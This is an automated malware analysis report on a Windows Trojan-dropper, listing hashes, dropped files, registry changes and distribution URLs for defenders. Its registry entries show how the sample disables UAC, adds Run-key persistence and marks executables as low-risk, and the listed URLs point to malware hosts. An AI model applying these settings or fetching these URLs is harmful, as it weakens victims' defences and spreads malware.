Gen.Variant.Adware.Strictor.49051_42b2afb0b1

by malwarelabrobot on April 22nd, 2016 in Malware Descriptions.

Trojan-Dropper.Win32.NSIS.abtf (Kaspersky), Gen:Variant.Adware.Strictor.49051 (B) (Emsisoft), Gen:Variant.Adware.Strictor.49051 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 42b2afb0b1e13f670af444bf40fb3434
SHA1: 90d9d4e054d1f510a77b0b56a3532d2b60de32d2
SHA256: 63a9cc6cdbbb56e9ed78ae1213e76c32a196edb1bc12d4db090892db38dce24c
SSDeep: 98304:lgbDPHGm0nvY0mFsWBTSYxTMjZNi7MFOuqS4F:mfHv0vY0msGVTyNP3qfF
Size: 4978012 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-02-24 21:20:04
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

setdd.exe:272
7za.exe:1932
CodecFixDivx.exe:244
mesox.exe:1904
%original file name%.exe:348
dxdiag.exe:632
irsetup.exe:492

The Trojan injects its code into the following process(es):

CodecFixDivx.exe:296
irsetup.exe:484

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setdd.exe:272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

The process 7za.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\setdd.exe (10753 bytes)

The process CodecFixDivx.exe:296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00046f60.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000479ef.a (1774 bytes)

The process mesox.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winrar-x64-520.exe (65332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.7z (21345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp\execDos.dll (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp\execDos.dll (0 bytes)

The process irsetup.exe:484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\after.exe (27907 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (20 bytes)
%WinDir%\chromebrowser.exe (164484 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dxdiag.exe (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\acc.enc (20527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\CodecFixDivx.enc (16975 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CodecFixDivx.exe (18485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__3137_il66746.enc (14515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\dxdiag.enc (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

The process irsetup.exe:492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G963G9AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHANSXIV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HDQZBC5E\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setupfiles.txt (44 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@payment[1].txt (303 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pastebin[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0XUJW5MR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mesox.exe (3972701 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

Registry activity

The process setdd.exe:272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 AE BC 44 13 F0 38 EE 57 3B 80 BE BF 1F BA 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process 7za.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 D1 F2 27 FD 5F 39 9C E1 AB 83 3F 3D 4D 5C 8F"

The process CodecFixDivx.exe:296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 58 62 47 82 36 A0 BD A4 19 19 53 DD 36 E6 3B"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1461205111"
"Name" = "CodecFixDivx.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process CodecFixDivx.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 0B 3A 1F 8D 69 AA B3 EB 90 FA 51 0A 9C 55 7F"

The process mesox.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF A6 26 44 3B 81 21 D1 D9 B5 EE 0D 4E E0 2F 7A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2.tmp\execDos.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 9F 6D B4 38 72 72 B6 9D 4A 42 43 10 42 EB 61"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2.tmp\execDos.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process dxdiag.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 7B 87 9A 6F A6 23 44 17 26 E0 27 C6 7C 89 DB"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

The process irsetup.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD F9 7E 5D 59 C5 F9 87 D2 E8 FA 35 F4 02 B5 26"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes" = ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"chromebrowser" = "%WinDir%\chromebrowser.exe"

The process irsetup.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 8A 7D 1B E9 48 54 E1 6B F2 DB 9D CF ED 2E 23"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
f482597af35485f86a44b370f790ed0e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00046f60.a
ec6e2decd6d06007df3ded778b5e8dfc c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\000479ef.a
42badc1d2f03a8b1e4875740d3d49336 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7za.exe
a069ef983c8877cb450c4e15354ea3a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\CodecFixDivx.exe
122e6a275e8a673d73a2ff59aa2249c4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\after.exe
9bdcf813d65265255b820bc7a704da3c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe
c3f5f4a1fb69b5889f0bbb313cf6017f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll
02f06e93d610a5426eaed734af4db35b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\dxdiag.exe
7db9449e8c71459d3d805cc45be1bb59 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\mesox.exe
0deb397ca1e716bb7b15e1754e52b2ac c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz2.tmp\execDos.dll
d4560733b5632b5107526e144a6e72e6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\setdd.exe
6158a1045c148df1aaddce15091362f3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\winrar-x64-520.exe
122e6a275e8a673d73a2ff59aa2249c4 c:\WINDOWS\chromebrowser.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 29324 29696 4.50526 419d4e1be1ac35a5db9c47f553b27cea
.rdata 36864 11118 11264 3.11773 cca1ca3fbf99570f6de9b43ce767f368
.data 49152 469916 512 1.25109 77f0839f8ebea31040e462523e1c770e
.ndata 520192 528384 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 1048576 7477 7680 3.47212 e82a5acd2b91e85e9209fa6fb84fd775
.reloc 1056768 4054 4096 3.87317 0fe4ef0a01be51cb5362c98b207ecf50

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 5
1ee74170ba503c923e6a4cb411b10165
74690178f39c529ca003cc8202f03196
64c23af54283fed3dd4e205eb494f39a
1764e5bd479a0a8497fafd6af33510a1
9dcc418f06fb9216cc7b95fa8f67a1ba

URLs

URL IP
hxxp://pastebin.com/raw/NgVcEX79 104.20.63.56
hxxp://alfafile.net/file/NFUG 195.211.221.157
hxxp://a7.alfafile.net/dl/8oGAY/CodecFix A.exe 78.108.187.86
